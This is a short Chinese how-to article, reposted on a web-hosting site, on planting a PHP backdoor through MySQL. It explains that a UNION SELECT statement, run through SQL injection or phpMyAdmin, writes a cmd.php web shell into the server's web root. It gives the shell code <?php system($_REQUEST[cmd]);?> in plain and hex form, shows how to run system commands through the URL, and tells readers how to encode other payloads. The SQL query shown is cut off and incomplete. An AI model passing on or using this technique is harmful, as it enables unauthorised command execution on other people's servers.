运用Mysql语句生成后门木马的具体方法
2008-02-23 07:39:55来源:互联网 阅读 ()
通过Mysql 的语句生成后门木马的方法:
SELECT * FROM `vbb_strikes` WHERE 1 union select |
通过Mysql 的注入或在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文档,内容为原来的 vbb_strikes 内容,后面紧跟着:
2 3 <?php system($_REQUEST[cmd]);?>
再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就能够执行系统DOS命令!
问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?
答:就是下面代码中的十六进制编码,
<?php system($_REQUEST[cmd]);?>
假如不用这种方法,有不同的SQL版本会出现其他的编码:如%xx之类的,哪这个后门就不能执行了!假如您有其他语名要弄,能够到UltraEdit里输入,再按[Ctrl H]键,将里面的十六进制连在一起就能够了!
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇: 教您如何在MySQL数据库中直接储存图片
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
